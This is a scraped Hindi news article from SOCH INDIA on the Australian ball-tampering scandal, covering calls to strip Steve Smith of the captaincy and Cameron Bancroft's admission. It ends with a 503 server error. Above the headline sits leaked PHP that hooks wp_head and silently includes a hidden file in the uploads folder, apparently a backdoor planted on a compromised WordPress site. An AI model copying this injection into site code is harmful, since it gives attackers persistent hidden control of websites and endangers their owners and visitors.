add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ऑस्ट्रेलियाई सरकार ने की स्टीव स्मिथ को कप्तानी से हटाने की मांग – SOCH INDIA
Menu

खेल
ऑस्ट्रेलियाई सरकार ने की स्टीव स्मिथ को कप्तानी से हटाने की मांग

nobanner

बॉल टेम्परिंग विवाद पर ऑस्ट्रेलियाई सरकार ने कड़ा रुख अपनाते हुए स्टीव स्मिथ की कप्तानी पर सवाल उठा दिए हैं. ऑस्ट्रेलियाई सरकार ने स्मिथ को टीम की कप्तानी से हटाने की मांग कर दी है. ऑस्ट्रेलियाई ओपनर बल्लेबाज कैमरन बेनक्रॉफ्ट पर साउथ अफ्रीका के खिलाफ तीसरे टेस्ट मैच के दौरान बॉल टेम्परिंग आरोप लगे हैं. बेनक्रॉफ्ट ने अपने उपर लगे इन आरोपों को स्वीकार कर लिया है.

बेनक्रॉफ्ट के साथ कप्तान स्मिथ ने भी इस पर माफी मांगी है. माफी मांगते हुए स्मिथ ने कहा, ‘मैदान पर जो कुछ भी हुआ हमें इसके बारे में जानकारी थी, हमने इसके बारे में बात की और सोचा था कि इससे हमें फायदा होगा. मुझे इस पर बिल्कुल भी गर्व नहीं है.”

स्मिथ ने कहा, “कोच इसमें शामिल नहीं हैं. मेरी कप्तानी में यह दोबारा नहीं होगा.”

क्रिकेट ऑस्ट्रेलिया की वेबसाइट के मुताबिक, ब्रेनक्रॉफ्ट को मैच के दौरान अपने पैंट से कोई पीले रंग की वस्तु निकालते हुए देखा गया था. इसके बाद अंपायरों ने उनसे पूछा था कि उनकी जेब में वो क्या था.

वीडियो में दिखाया गया है कि बेनक्रॉफ्ट गेंद पर कुछ लगा रहे हैं और उसे फिर वापस अपनी जेब में रख रहे हैं. बेनक्रॉफ्ट ने माना है कि वो पीले रंग का टेप था.

सीए के ट्विटर ने बेनक्रॉफ्ट के हवाले से लिखा है, “हमने मैच अधिकारियों से बात की है. मुझ पर बॉल टेम्परिंग का आरोप लगाया गया है.”

उन्होंने कहा, “मैं यहां इसलिए हूं क्योंकि मैं अपने बर्ताब के लिए दोषी हूं. मुझे इसके परिणाम भुगतने होंगे.”

आईसीसी के नियमों के मुताबिक, गेंद से छेड़छाड़ लेवल-2 का अपराध है जिसमें खिलाड़ी पर 100 फीसदी मैच फीस का जुर्माना लगता है और साथ ही चार नकारात्मक अंक तक खिलाड़ी के हिस्से आ सकते हैं जो एक टेस्ट मैच के प्रतिबंध के लिए काफी हैं.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.